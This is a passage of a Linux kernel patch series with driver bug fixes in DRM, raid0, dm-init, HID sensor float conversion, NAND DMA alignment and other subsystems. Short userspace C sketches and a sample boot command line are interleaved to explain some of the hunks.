+ 	auxiliary_device_delete(data);
+ }
+ 
+-/*
+- * AUX bus docs say that a non-NULL release is mandatory, but it makes no
+- * sense for the model used here where all of the aux devices are allocated
+- * in the single shared structure. We'll use this noop as a workaround.
+- */
+-static void ti_sn65dsi86_noop(struct device *dev) {}
++static void ti_sn65dsi86_aux_device_release(struct device *dev)
++{
++	struct auxiliary_device *aux = container_of(dev, struct auxiliary_device, dev);
++
++	kfree(aux);
++}
+ 
+ static int ti_sn65dsi86_add_aux_device(struct ti_sn65dsi86 *pdata,
+-				       struct auxiliary_device *aux,
++				       struct auxiliary_device **aux_out,
+ 				       const char *name)
+ {
+ 	struct device *dev = pdata->dev;
++	struct auxiliary_device *aux;
+ 	int ret;
+ 
++	aux = kzalloc(sizeof(*aux), GFP_KERNEL);
++	if (!aux)
++		return -ENOMEM;
++
+ 	aux->name = name;
+ 	aux->dev.parent = dev;
+-	aux->dev.release = ti_sn65dsi86_noop;
++	aux->dev.release = ti_sn65dsi86_aux_device_release;
+ 	device_set_of_node_from_dev(&aux->dev, dev);
+ 	ret = auxiliary_device_init(aux);
+-	if (ret)
++	if (ret) {
++		kfree(aux);
+ 		return ret;
++	}
+ 	ret = devm_add_action_or_reset(dev, ti_sn65dsi86_uninit_aux, aux);
+ 	if (ret)
+ 		return ret;
+@@ -497,6 +504,8 @@ static int ti_sn65dsi86_add_aux_device(struct ti_sn65dsi86 *pdata,
+ 	if (ret)
+ 		return ret;
+ 	ret = devm_add_action_or_reset(dev, ti_sn65dsi86_delete_aux, aux);
++	if (!ret)
++		*aux_out = aux;
+ 
+ 	return ret;
+ }
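The pattern above (allocate each auxiliary device separately and free it from its release callback) is the general driver-model ownership rule that the old no-op release sidestepped. A userspace analogue of that ownership pattern (a sketch, not kernel API):

#include <stdio.h>
#include <stdlib.h>

struct obj {
	const char *name;
	void (*release)(struct obj *);
};

/* The release callback owns the memory, so every obj must be its own
 * allocation -- exactly why the bridge now kzalloc()s each aux device. */
static void obj_release(struct obj *o)
{
	free(o);
}

static struct obj *obj_create(const char *name)
{
	struct obj *o = calloc(1, sizeof(*o));
	if (!o)
		return NULL;
	o->name = name;
	o->release = obj_release;
	return o;
}

int main(void)
{
	struct obj *o = obj_create("bridge");
	if (o)
		o->release(o); /* final reference dropped */
	return 0;
}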
+diff --git a/drivers/gpu/drm/drm_atomic.c b/drivers/gpu/drm/drm_atomic.c
+index c0dc5858a7237..7115898258afb 100644
+--- a/drivers/gpu/drm/drm_atomic.c
++++ b/drivers/gpu/drm/drm_atomic.c
+@@ -140,6 +140,12 @@ drm_atomic_state_init(struct drm_device *dev, struct drm_atomic_state *state)
+ 	if (!state->planes)
+ 		goto fail;
+ 
++	/*
++	 * Because drm_atomic_state can be committed asynchronously we need our
++	 * own reference and cannot rely on the one implied by drm_file in the
++	 * ioctl call.
++	 */
++	drm_dev_get(dev);
+ 	state->dev = dev;
+ 
+ 	drm_dbg_atomic(dev, "Allocated atomic state %p\n", state);
+@@ -299,7 +305,8 @@ EXPORT_SYMBOL(drm_atomic_state_clear);
+ void __drm_atomic_state_free(struct kref *ref)
+ {
+ 	struct drm_atomic_state *state = container_of(ref, typeof(*state), ref);
+-	struct drm_mode_config *config = &state->dev->mode_config;
++	struct drm_device *dev = state->dev;
++	struct drm_mode_config *config = &dev->mode_config;
+ 
+ 	drm_atomic_state_clear(state);
+ 
+@@ -311,6 +318,8 @@ void __drm_atomic_state_free(struct kref *ref)
+ 		drm_atomic_state_default_release(state);
+ 		kfree(state);
+ 	}
++
++	drm_dev_put(dev);
+ }
+ EXPORT_SYMBOL(__drm_atomic_state_free);
+ 
+diff --git a/drivers/gpu/drm/drm_atomic_helper.c b/drivers/gpu/drm/drm_atomic_helper.c
+index 02b4a7dc92f5e..202a9990f4517 100644
+--- a/drivers/gpu/drm/drm_atomic_helper.c
++++ b/drivers/gpu/drm/drm_atomic_helper.c
+@@ -1225,7 +1225,16 @@ disable_outputs(struct drm_device *dev, struct drm_atomic_state *old_state)
+ 			continue;
+ 
+ 		ret = drm_crtc_vblank_get(crtc);
+-		WARN_ONCE(ret != -EINVAL, "driver forgot to call drm_crtc_vblank_off()\n");
++		/*
++		 * Self-refresh is not a true "disable"; ensure vblank remains
++		 * enabled.
++		 */
++		if (new_crtc_state->self_refresh_active)
++			WARN_ONCE(ret != 0,
++				  "driver disabled vblank in self-refresh\n");
++		else
++			WARN_ONCE(ret != -EINVAL,
++				  "driver forgot to call drm_crtc_vblank_off()\n");
+ 		if (ret == 0)
+ 			drm_crtc_vblank_put(crtc);
+ 	}
+diff --git a/drivers/gpu/drm/drm_client.c b/drivers/gpu/drm/drm_client.c
+index 2b230b4d69423..dcbeeb68ca641 100644
+--- a/drivers/gpu/drm/drm_client.c
++++ b/drivers/gpu/drm/drm_client.c
+@@ -122,13 +122,34 @@ EXPORT_SYMBOL(drm_client_init);
+  * drm_client_register() it is no longer permissible to call drm_client_release()
+  * directly (outside the unregister callback), instead cleanup will happen
+  * automatically on driver unload.
++ *
++ * Registering a client generates a hotplug event that allows the client
++ * to set up its display from pre-existing outputs. The client must have
++ * initialized its state to be able to handle the hotplug event successfully.
+  */
+ void drm_client_register(struct drm_client_dev *client)
+ {
+ 	struct drm_device *dev = client->dev;
++	int ret;
+ 
+ 	mutex_lock(&dev->clientlist_mutex);
+ 	list_add(&client->list, &dev->clientlist);
++
++	if (client->funcs && client->funcs->hotplug) {
++		/*
++		 * Perform an initial hotplug event to pick up the
++		 * display configuration for the client. This step
++		 * has to be performed *after* registering the client
++		 * in the list of clients, or a concurrent hotplug
++		 * event might be lost, leaving the display off.
++		 *
++		 * Hold the clientlist_mutex as for a regular hotplug
++		 * event.
++		 */
++		ret = client->funcs->hotplug(client);
++		if (ret)
++			drm_dbg_kms(dev, "client hotplug ret=%d\n", ret);
++	}
+ 	mutex_unlock(&dev->clientlist_mutex);
+ }
+ EXPORT_SYMBOL(drm_client_register);
+diff --git a/drivers/gpu/drm/drm_fb_helper.c b/drivers/gpu/drm/drm_fb_helper.c
+index 76e46713b2f0c..442746d9777a4 100644
+--- a/drivers/gpu/drm/drm_fb_helper.c
++++ b/drivers/gpu/drm/drm_fb_helper.c
+@@ -2634,10 +2634,6 @@ void drm_fbdev_generic_setup(struct drm_device *dev,
+ 		preferred_bpp = 32;
+ 	fb_helper->preferred_bpp = preferred_bpp;
+ 
+-	ret = drm_fbdev_client_hotplug(&fb_helper->client);
+-	if (ret)
+-		drm_dbg_kms(dev, "client hotplug ret=%d\n", ret);
+-
+ 	drm_client_register(&fb_helper->client);
+ }
+ EXPORT_SYMBOL(drm_fbdev_generic_setup);
+diff --git a/drivers/gpu/drm/i915/display/intel_display.c b/drivers/gpu/drm/i915/display/intel_display.c
+index 455d9ae6c41c9..da9b995b54c8f 100644
+--- a/drivers/gpu/drm/i915/display/intel_display.c
++++ b/drivers/gpu/drm/i915/display/intel_display.c
+@@ -5133,7 +5133,6 @@ copy_bigjoiner_crtc_state_modeset(struct intel_atomic_state *state,
+ 	saved_state->uapi = slave_crtc_state->uapi;
+ 	saved_state->scaler_state = slave_crtc_state->scaler_state;
+ 	saved_state->shared_dpll = slave_crtc_state->shared_dpll;
+-	saved_state->dpll_hw_state = slave_crtc_state->dpll_hw_state;
+ 	saved_state->crc_enabled = slave_crtc_state->crc_enabled;
+ 
+ 	intel_crtc_free_hw_state(slave_crtc_state);
+diff --git a/drivers/gpu/drm/i915/gt/intel_gtt.c b/drivers/gpu/drm/i915/gt/intel_gtt.c
+index 2eaeba14319e9..f4879f437bfa3 100644
+--- a/drivers/gpu/drm/i915/gt/intel_gtt.c
++++ b/drivers/gpu/drm/i915/gt/intel_gtt.c
+@@ -611,7 +611,7 @@ __vm_create_scratch_for_read(struct i915_address_space *vm, unsigned long size)
+ 	if (IS_ERR(obj))
+ 		return ERR_CAST(obj);
+ 
+-	i915_gem_object_set_cache_coherency(obj, I915_CACHING_CACHED);
++	i915_gem_object_set_cache_coherency(obj, I915_CACHE_LLC);
+ 
+ 	vma = i915_vma_instance(obj, vm, NULL);
+ 	if (IS_ERR(vma)) {
+diff --git a/drivers/gpu/drm/panel/panel-simple.c b/drivers/gpu/drm/panel/panel-simple.c
+index 7ca00b0323362..f851aaf2c5917 100644
+--- a/drivers/gpu/drm/panel/panel-simple.c
++++ b/drivers/gpu/drm/panel/panel-simple.c
+@@ -2117,6 +2117,7 @@ static const struct panel_desc innolux_at043tn24 = {
+ 		.height = 54,
+ 	},
+ 	.bus_format = MEDIA_BUS_FMT_RGB888_1X24,
++	.connector_type = DRM_MODE_CONNECTOR_DPI,
+ 	.bus_flags = DRM_BUS_FLAG_DE_HIGH | DRM_BUS_FLAG_PIXDATA_DRIVE_POSEDGE,
+ };
+ 
+@@ -3109,6 +3110,7 @@ static const struct drm_display_mode powertip_ph800480t013_idf02_mode = {
+ 	.vsync_start = 480 + 49,
+ 	.vsync_end = 480 + 49 + 2,
+ 	.vtotal = 480 + 49 + 2 + 22,
++	.flags = DRM_MODE_FLAG_NVSYNC | DRM_MODE_FLAG_NHSYNC,
+ };
+ 
+ static const struct panel_desc powertip_ph800480t013_idf02  = {
+diff --git a/drivers/gpu/drm/rockchip/rockchip_drm_vop.c b/drivers/gpu/drm/rockchip/rockchip_drm_vop.c
+index fa1f4ee6d1950..9fea03121247e 100644
+--- a/drivers/gpu/drm/rockchip/rockchip_drm_vop.c
++++ b/drivers/gpu/drm/rockchip/rockchip_drm_vop.c
+@@ -717,13 +717,13 @@ static void vop_crtc_atomic_disable(struct drm_crtc *crtc,
+ 	if (crtc->state->self_refresh_active)
+ 		rockchip_drm_set_win_enabled(crtc, false);
+ 
++	if (crtc->state->self_refresh_active)
++		goto out;
++
+ 	mutex_lock(&vop->vop_lock);
+ 
+ 	drm_crtc_vblank_off(crtc);
+ 
+-	if (crtc->state->self_refresh_active)
+-		goto out;
+-
+ 	/*
+ 	 * Vop standby will take effect at the end of the current frame;
+ 	 * if the dsp hold valid irq happens, standby is complete.
+@@ -757,9 +757,9 @@ static void vop_crtc_atomic_disable(struct drm_crtc *crtc,
+ 	vop_core_clks_disable(vop);
+ 	pm_runtime_put(vop->dev);
+ 
+-out:
+ 	mutex_unlock(&vop->vop_lock);
+ 
++out:
+ 	if (crtc->state->event && !crtc->state->active) {
+ 		spin_lock_irq(&crtc->dev->event_lock);
+ 		drm_crtc_send_vblank_event(crtc, crtc->state->event);
+diff --git a/drivers/gpu/drm/ttm/ttm_bo.c b/drivers/gpu/drm/ttm/ttm_bo.c
+index 7c8e8be774f1d..f2c4e9037d6e0 100644
+--- a/drivers/gpu/drm/ttm/ttm_bo.c
++++ b/drivers/gpu/drm/ttm/ttm_bo.c
+@@ -1165,6 +1165,7 @@ int ttm_bo_swapout(struct ttm_buffer_object *bo, struct ttm_operation_ctx *ctx,
+ 		ret = ttm_bo_handle_move_mem(bo, evict_mem, true, &ctx, &hop);
+ 		if (unlikely(ret != 0)) {
+ 			WARN(ret == -EMULTIHOP, "Unexpected multihop in swapout - likely driver bug.\n");
++			ttm_resource_free(bo, &evict_mem);
+ 			goto out;
+ 		}
+ 	}
+diff --git a/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_desc.c b/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_desc.c
+index 6f0d332ccf51c..06bdcf072d10c 100644
+--- a/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_desc.c
++++ b/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_desc.c
+@@ -132,29 +132,45 @@ static void get_common_inputs(struct common_input_property *common, int report_i
+ 	common->event_type = HID_USAGE_SENSOR_EVENT_DATA_UPDATED_ENUM;
+ }
+ 
+-static int float_to_int(u32 float32)
++static int float_to_int(u32 flt32_val)
+ {
+ 	int fraction, shift, mantissa, sign, exp, zeropre;
+ 
+-	mantissa = float32 & GENMASK(22, 0);
+-	sign = (float32 & BIT(31)) ? -1 : 1;
+-	exp = (float32 & ~BIT(31)) >> 23;
++	mantissa = flt32_val & GENMASK(22, 0);
++	sign = (flt32_val & BIT(31)) ? -1 : 1;
++	exp = (flt32_val & ~BIT(31)) >> 23;
+ 
+ 	if (!exp && !mantissa)
+ 		return 0;
+ 
++	/*
++	 * Calculate the exponent and fraction parts of the
++	 * floating-point representation.
++	 */
+ 	exp -= 127;
+ 	if (exp < 0) {
+ 		exp = -exp;
++		if (exp >= BITS_PER_TYPE(u32))
++			return 0;
+ 		zeropre = (((BIT(23) + mantissa) * 100) >> 23) >> exp;
+ 		return zeropre >= 50 ? sign : 0;
+ 	}
+ 
+ 	shift = 23 - exp;
+-	float32 = BIT(exp) + (mantissa >> shift);
+-	fraction = mantissa & GENMASK(shift - 1, 0);
++	if (abs(shift) >= BITS_PER_TYPE(u32))
++		return 0;
++
++	if (shift < 0) {
++		shift = -shift;
++		flt32_val = BIT(exp) + (mantissa << shift);
++		shift = 0;
++	} else {
++		flt32_val = BIT(exp) + (mantissa >> shift);
++	}
++
++	fraction = (shift == 0) ? 0 : mantissa & GENMASK(shift - 1, 0);
+ 
+-	return (((fraction * 100) >> shift) >= 50) ? sign * (float32 + 1) : sign * float32;
++	return (((fraction * 100) >> shift) >= 50) ? sign * (flt32_val + 1) : sign * flt32_val;
+ }
+ 
+ static u8 get_input_rep(u8 current_index, int sensor_idx, int report_id,
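The reworked helper is easier to follow against a standalone model: decode the IEEE-754 single from its raw bits, guard every shift count, and round the fraction. A userspace sketch of the same idea (illustrative, not the driver code):

#include <stdint.h>
#include <stdio.h>
#include <string.h>

static int f32_bits_to_int(uint32_t v)
{
	int sign = (v & 0x80000000u) ? -1 : 1;
	int exp = (int)((v & 0x7FFFFFFFu) >> 23) - 127;
	uint32_t mant = v & 0x7FFFFFu;

	if (exp == -127 && !mant)
		return 0;
	if (exp < 0) {                  /* |x| < 1: round to 0 or +/-1 */
		if (-exp >= 32)
			return 0;
		uint64_t pre = ((((1ull << 23) + mant) * 100) >> 23) >> -exp;
		return pre >= 50 ? sign : 0;
	}
	if (exp >= 31)                  /* shift below would be undefined */
		return 0;

	int shift = 23 - exp;
	uint32_t whole = shift >= 0 ? (1u << exp) + (mant >> shift)
				    : (1u << exp) + (mant << -shift);
	uint32_t frac = shift <= 0 ? 0 : mant & ((1u << shift) - 1);

	if (shift > 0 && (((uint64_t)frac * 100) >> shift) >= 50)
		whole++;                /* round half away from zero */
	return sign * (int)whole;
}

int main(void)
{
	float f = -2.75f;
	uint32_t bits;

	memcpy(&bits, &f, sizeof(bits));
	printf("%d\n", f32_bits_to_int(bits)); /* -3 */
	return 0;
}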
+diff --git a/drivers/iio/adc/meson_saradc.c b/drivers/iio/adc/meson_saradc.c
+index 1a68b099d323c..eb965974ed859 100644
+--- a/drivers/iio/adc/meson_saradc.c
++++ b/drivers/iio/adc/meson_saradc.c
+@@ -71,7 +71,7 @@
+ 	#define MESON_SAR_ADC_REG3_PANEL_DETECT_COUNT_MASK	GENMASK(20, 18)
+ 	#define MESON_SAR_ADC_REG3_PANEL_DETECT_FILTER_TB_MASK	GENMASK(17, 16)
+ 	#define MESON_SAR_ADC_REG3_ADC_CLK_DIV_SHIFT		10
+-	#define MESON_SAR_ADC_REG3_ADC_CLK_DIV_WIDTH		5
++	#define MESON_SAR_ADC_REG3_ADC_CLK_DIV_WIDTH		6
+ 	#define MESON_SAR_ADC_REG3_BLOCK_DLY_SEL_MASK		GENMASK(9, 8)
+ 	#define MESON_SAR_ADC_REG3_BLOCK_DLY_MASK		GENMASK(7, 0)
+ 
+diff --git a/drivers/md/dm-init.c b/drivers/md/dm-init.c
+index b0c45c6ebe0bf..dc4381d683131 100644
+--- a/drivers/md/dm-init.c
++++ b/drivers/md/dm-init.c
+@@ -8,6 +8,7 @@
+  */
+ 
+ #include <linux/ctype.h>
++#include <linux/delay.h>
+ #include <linux/device.h>
+ #include <linux/device-mapper.h>
+ #include <linux/init.h>
+@@ -18,12 +19,17 @@
+ #define DM_MAX_DEVICES 256
+ #define DM_MAX_TARGETS 256
+ #define DM_MAX_STR_SIZE 4096
++#define DM_MAX_WAITFOR 256
+ 
+ static char *create;
+ 
++static char *waitfor[DM_MAX_WAITFOR];
++
+ /*
+  * Format: dm-mod.create=<name>,<uuid>,<minor>,<flags>,<table>[,<table>+][;<name>,<uuid>,<minor>,<flags>,<table>[,<table>+]+]
+  * Table format: <start_sector> <num_sectors> <target_type> <target_args>
++ * Block devices to wait for (until they become available) before setting up tables:
++ * dm-mod.waitfor=<device1>[,..,<deviceN>]
+  *
+  * See Documentation/admin-guide/device-mapper/dm-init.rst for dm-mod.create="..." format
+  * details.
+@@ -266,7 +272,7 @@ static int __init dm_init_init(void)
+ 	struct dm_device *dev;
+ 	LIST_HEAD(devices);
+ 	char *str;
+-	int r;
++	int i, r;
+ 
+ 	if (!create)
+ 		return 0;
+@@ -286,6 +292,17 @@ static int __init dm_init_init(void)
+ 	DMINFO("waiting for all devices to be available before creating mapped devices");
+ 	wait_for_device_probe();
+ 
++	for (i = 0; i < ARRAY_SIZE(waitfor); i++) {
++		if (waitfor[i]) {
++			DMINFO("waiting for device %s ...", waitfor[i]);
++			while (!dm_get_dev_t(waitfor[i]))
++				msleep(5);
++		}
++	}
++
++	if (waitfor[0])
++		DMINFO("all devices available");
++
+ 	list_for_each_entry(dev, &devices, list) {
+ 		if (dm_early_create(&dev->dmi, dev->table,
+ 				    dev->target_args_array))
+@@ -301,3 +318,6 @@ late_initcall(dm_init_init);
+ 
+ module_param(create, charp, 0);
+ MODULE_PARM_DESC(create, "Create a mapped device in early boot");
++
++module_param_array(waitfor, charp, NULL, 0);
++MODULE_PARM_DESC(waitfor, "Devices to wait for before setting up tables");
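A hypothetical boot command line combining the new parameter with dm-mod.create (device paths and the linear table are illustrative, following the dm-init documentation format):

dm-mod.waitfor=/dev/sda2,/dev/sdb1 \
dm-mod.create="lroot,,,rw, 0 4096 linear /dev/sda2 0, 4096 4096 linear /dev/sdb1 0" \
root=/dev/dm-0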
+diff --git a/drivers/md/dm-integrity.c b/drivers/md/dm-integrity.c
+index a2b8f8781a99f..fe7dad3ffa75f 100644
+--- a/drivers/md/dm-integrity.c
++++ b/drivers/md/dm-integrity.c
+@@ -33,11 +33,11 @@
+ #define DEFAULT_BUFFER_SECTORS		128
+ #define DEFAULT_JOURNAL_WATERMARK	50
+ #define DEFAULT_SYNC_MSEC		10000
+-#define DEFAULT_MAX_JOURNAL_SECTORS	131072
++#define DEFAULT_MAX_JOURNAL_SECTORS	(IS_ENABLED(CONFIG_64BIT) ? 131072 : 8192)
+ #define MIN_LOG2_INTERLEAVE_SECTORS	3
+ #define MAX_LOG2_INTERLEAVE_SECTORS	31
+ #define METADATA_WORKQUEUE_MAX_ACTIVE	16
+-#define RECALC_SECTORS			32768
++#define RECALC_SECTORS			(IS_ENABLED(CONFIG_64BIT) ? 32768 : 2048)
+ #define RECALC_WRITE_SUPER		16
+ #define BITMAP_BLOCK_SIZE		4096	/* don't change it */
+ #define BITMAP_FLUSH_INTERVAL		(10 * HZ)
+diff --git a/drivers/md/dm-verity-loadpin.c b/drivers/md/dm-verity-loadpin.c
+index 4f78cc55c2514..0666699b68581 100644
+--- a/drivers/md/dm-verity-loadpin.c
++++ b/drivers/md/dm-verity-loadpin.c
+@@ -58,6 +58,9 @@ bool dm_verity_loadpin_is_bdev_trusted(struct block_device *bdev)
+ 	int srcu_idx;
+ 	bool trusted = false;
+ 
++	if (bdev == NULL)
++		return false;
++
+ 	if (list_empty(&dm_verity_loadpin_trusted_root_digests))
+ 		return false;
+ 
+diff --git a/drivers/md/raid0.c b/drivers/md/raid0.c
+index b536befd88988..0f7c3b3c62b25 100644
+--- a/drivers/md/raid0.c
++++ b/drivers/md/raid0.c
+@@ -270,6 +270,18 @@ static int create_strip_zones(struct mddev *mddev, struct r0conf **private_conf)
+ 		goto abort;
+ 	}
+ 
++	if (conf->layout == RAID0_ORIG_LAYOUT) {
++		for (i = 1; i < conf->nr_strip_zones; i++) {
++			sector_t first_sector = conf->strip_zone[i-1].zone_end;
++
++			sector_div(first_sector, mddev->chunk_sectors);
++			zone = conf->strip_zone + i;
++			/* disk_shift is first disk index used in the zone */
++			zone->disk_shift = sector_div(first_sector,
++						      zone->nb_dev);
++		}
++	}
++
+ 	pr_debug("md/raid0:%s: done.\n", mdname(mddev));
+ 	*private_conf = conf;
+ 
+@@ -431,6 +443,20 @@ exit_acct_set:
+ 	return ret;
+ }
+ 
++/*
++ * Convert disk_index to the disk order in which it is read/written.
++ *  For example, if we have 4 disks, they are numbered 0,1,2,3. If we
++ *  write the disks starting at disk 3, then the read/write order would
++ *  be disk 3, then 0, then 1, and then disk 2 and we want map_disk_shift()
++ *  to map the disks as follows 0,1,2,3 => 1,2,3,0. So disk 0 would map
++ *  to 1, 1 to 2, 2 to 3, and 3 to 0. That way we can compare disks in
++ *  that 'output' space to understand the read/write disk ordering.
++ */
++static int map_disk_shift(int disk_index, int num_disks, int disk_shift)
++{
++	return ((disk_index + num_disks - disk_shift) % num_disks);
++}
++
+ static void raid0_handle_discard(struct mddev *mddev, struct bio *bio)
+ {
+ 	struct r0conf *conf = mddev->private;
+@@ -444,7 +470,9 @@ static void raid0_handle_discard(struct mddev *mddev, struct bio *bio)
+ 	sector_t end_disk_offset;
+ 	unsigned int end_disk_index;
+ 	unsigned int disk;
++	sector_t orig_start, orig_end;
+ 
++	orig_start = start;
+ 	zone = find_zone(conf, &start);
+ 
+ 	if (bio_end_sector(bio) > zone->zone_end) {
+@@ -458,6 +486,7 @@ static void raid0_handle_discard(struct mddev *mddev, struct bio *bio)
+ 	} else
+ 		end = bio_end_sector(bio);
+ 
++	orig_end = end;
+ 	if (zone != conf->strip_zone)
+ 		end = end - zone[-1].zone_end;
+ 
+@@ -469,13 +498,26 @@ static void raid0_handle_discard(struct mddev *mddev, struct bio *bio)
+ 	last_stripe_index = end;
+ 	sector_div(last_stripe_index, stripe_size);
+ 
+-	start_disk_index = (int)(start - first_stripe_index * stripe_size) /
+-		mddev->chunk_sectors;
++	/* In the first zone the original and alternate layouts are the same */
++	if ((conf->layout == RAID0_ORIG_LAYOUT) && (zone != conf->strip_zone)) {
++		sector_div(orig_start, mddev->chunk_sectors);
++		start_disk_index = sector_div(orig_start, zone->nb_dev);
++		start_disk_index = map_disk_shift(start_disk_index,
++						  zone->nb_dev,
++						  zone->disk_shift);
++		sector_div(orig_end, mddev->chunk_sectors);
++		end_disk_index = sector_div(orig_end, zone->nb_dev);
++		end_disk_index = map_disk_shift(end_disk_index,
++						zone->nb_dev, zone->disk_shift);
++	} else {
++		start_disk_index = (int)(start - first_stripe_index * stripe_size) /
++			mddev->chunk_sectors;
++		end_disk_index = (int)(end - last_stripe_index * stripe_size) /
++			mddev->chunk_sectors;
++	}
+ 	start_disk_offset = ((int)(start - first_stripe_index * stripe_size) %
+ 		mddev->chunk_sectors) +
+ 		first_stripe_index * mddev->chunk_sectors;
+-	end_disk_index = (int)(end - last_stripe_index * stripe_size) /
+-		mddev->chunk_sectors;
+ 	end_disk_offset = ((int)(end - last_stripe_index * stripe_size) %
+ 		mddev->chunk_sectors) +
+ 		last_stripe_index * mddev->chunk_sectors;
+@@ -483,18 +525,22 @@ static void raid0_handle_discard(struct mddev *mddev, struct bio *bio)
+ 	for (disk = 0; disk < zone->nb_dev; disk++) {
+ 		sector_t dev_start, dev_end;
+ 		struct md_rdev *rdev;
++		int compare_disk;
++
++		compare_disk = map_disk_shift(disk, zone->nb_dev,
++					      zone->disk_shift);
+ 
+-		if (disk < start_disk_index)
++		if (compare_disk < start_disk_index)
+ 			dev_start = (first_stripe_index + 1) *
+ 				mddev->chunk_sectors;
+-		else if (disk > start_disk_index)
++		else if (compare_disk > start_disk_index)
+ 			dev_start = first_stripe_index * mddev->chunk_sectors;
+ 		else
+ 			dev_start = start_disk_offset;
+ 
+-		if (disk < end_disk_index)
++		if (compare_disk < end_disk_index)
+ 			dev_end = (last_stripe_index + 1) * mddev->chunk_sectors;
+-		else if (disk > end_disk_index)
++		else if (compare_disk > end_disk_index)
+ 			dev_end = last_stripe_index * mddev->chunk_sectors;
+ 		else
+ 			dev_end = end_disk_offset;
+diff --git a/drivers/md/raid0.h b/drivers/md/raid0.h
+index 3816e5477db1e..8cc761ca74230 100644
+--- a/drivers/md/raid0.h
++++ b/drivers/md/raid0.h
+@@ -6,6 +6,7 @@ struct strip_zone {
+ 	sector_t zone_end;	/* Start of the next zone (in sectors) */
+ 	sector_t dev_start;	/* Zone offset in real dev (in sectors) */
+ 	int	 nb_dev;	/* # of devices attached to the zone */
++	int	 disk_shift;	/* start disk for the original layout */
+ };
+ 
+ /* Linux 3.14 (20d0189b101) made an unintended change to
+diff --git a/drivers/mfd/qcom-pm8008.c b/drivers/mfd/qcom-pm8008.c
+index 9f3c4a01b4c1c..4af1d368c321b 100644
+--- a/drivers/mfd/qcom-pm8008.c
++++ b/drivers/mfd/qcom-pm8008.c
+@@ -233,6 +233,7 @@ static const struct of_device_id pm8008_match[] = {
+ 	{ .compatible = "qcom,pm8008", },
+ 	{ },
+ };
++MODULE_DEVICE_TABLE(of, pm8008_match);
+ 
+ static struct i2c_driver pm8008_mfd_driver = {
+ 	.driver = {
+diff --git a/drivers/misc/fastrpc.c b/drivers/misc/fastrpc.c
+index e5cabb9012135..13518cac076c7 100644
+--- a/drivers/misc/fastrpc.c
++++ b/drivers/misc/fastrpc.c
+@@ -1260,7 +1260,7 @@ static int fastrpc_init_create_process(struct fastrpc_user *fl,
+ 
+ 	sc = FASTRPC_SCALARS(FASTRPC_RMID_INIT_CREATE, 4, 0);
+ 	if (init.attrs)
+-		sc = FASTRPC_SCALARS(FASTRPC_RMID_INIT_CREATE_ATTR, 6, 0);
++		sc = FASTRPC_SCALARS(FASTRPC_RMID_INIT_CREATE_ATTR, 4, 0);
+ 
+ 	err = fastrpc_internal_invoke(fl, true, FASTRPC_INIT_HANDLE,
+ 				      sc, args);
+diff --git a/drivers/misc/pci_endpoint_test.c b/drivers/misc/pci_endpoint_test.c
+index 11530b4ec3892..d1e2f22537dbe 100644
+--- a/drivers/misc/pci_endpoint_test.c
++++ b/drivers/misc/pci_endpoint_test.c
+@@ -728,6 +728,10 @@ static long pci_endpoint_test_ioctl(struct file *file, unsigned int cmd,
+ 	struct pci_dev *pdev = test->pdev;
+ 
+ 	mutex_lock(&test->mutex);
++
++	reinit_completion(&test->irq_raised);
++	test->last_irq = -ENODATA;
++
+ 	switch (cmd) {
+ 	case PCITEST_BAR:
+ 		bar = arg;
+@@ -937,6 +941,9 @@ static void pci_endpoint_test_remove(struct pci_dev *pdev)
+ 	if (id < 0)
+ 		return;
+ 
++	pci_endpoint_test_release_irq(test);
++	pci_endpoint_test_free_irq_vectors(test);
++
+ 	misc_deregister(&test->miscdev);
+ 	kfree(misc_device->name);
+ 	kfree(test->name);
+@@ -946,9 +953,6 @@ static void pci_endpoint_test_remove(struct pci_dev *pdev)
+ 			pci_iounmap(pdev, test->bar[bar]);
+ 	}
+ 
+-	pci_endpoint_test_release_irq(test);
+-	pci_endpoint_test_free_irq_vectors(test);
+-
+ 	pci_release_regions(pdev);
+ 	pci_disable_device(pdev);
+ }
+diff --git a/drivers/mtd/nand/raw/meson_nand.c b/drivers/mtd/nand/raw/meson_nand.c
+index 074e14225c06a..029a2a302aa65 100644
+--- a/drivers/mtd/nand/raw/meson_nand.c
++++ b/drivers/mtd/nand/raw/meson_nand.c
+@@ -76,6 +76,7 @@
+ #define GENCMDIADDRH(aih, addr)		((aih) | (((addr) >> 16) & 0xffff))
+ 
+ #define DMA_DIR(dir)		((dir) ? NFC_CMD_N2M : NFC_CMD_M2N)
++#define DMA_ADDR_ALIGN		8
+ 
+ #define ECC_CHECK_RETURN_FF	(-1)
+ 
+@@ -842,6 +843,9 @@ static int meson_nfc_read_oob(struct nand_chip *nand, int page)
+ 
+ static bool meson_nfc_is_buffer_dma_safe(const void *buffer)
+ {
++	if ((uintptr_t)buffer % DMA_ADDR_ALIGN)
++		return false;
++
+ 	if (virt_addr_valid(buffer) && (!object_is_on_stack(buffer)))
+ 		return true;
+ 	return false;
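The new test rejects buffers whose address is not 8-byte aligned before the existing validity checks run. A trivial standalone illustration of the predicate, assuming DMA_ADDR_ALIGN == 8 as defined above:

#include <stdint.h>
#include <stdio.h>

#define DMA_ADDR_ALIGN 8

static int dma_addr_ok(const void *p)
{
	return ((uintptr_t)p % DMA_ADDR_ALIGN) == 0;
}

int main(void)
{
	long long buf[2];       /* at least 8-byte aligned on common ABIs */
	printf("%d %d\n", dma_addr_ok(buf), dma_addr_ok((char *)buf + 1));
	return 0;
}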
+diff --git a/drivers/net/dsa/qca/qca8k-8xxx.c b/drivers/net/dsa/qca/qca8k-8xxx.c
+index 7a6166a0c9bcc..b3f7988668996 100644
+--- a/drivers/net/dsa/qca/qca8k-8xxx.c
++++ b/drivers/net/dsa/qca/qca8k-8xxx.c
+@@ -469,6 +469,9 @@ qca8k_phy_eth_busy_wait(struct qca8k_mgmt_eth_data *mgmt_eth_data,
+ 	bool ack;
+ 	int ret;
+ 
++	if (!skb)
++		return -ENOMEM;
++
+ 	reinit_completion(&mgmt_eth_data->rw_done);
+ 
+ 	/* Increment seq_num and set it in the copy pkt */
+diff --git a/drivers/net/ethernet/amazon/ena/ena_com.c b/drivers/net/ethernet/amazon/ena/ena_com.c
+index 451c3a1b62553..633b321d7fdd9 100644
+--- a/drivers/net/ethernet/amazon/ena/ena_com.c
++++ b/drivers/net/ethernet/amazon/ena/ena_com.c
+@@ -35,6 +35,8 @@
+ 
+ #define ENA_REGS_ADMIN_INTR_MASK 1
+ 
++#define ENA_MAX_BACKOFF_DELAY_EXP 16U
++
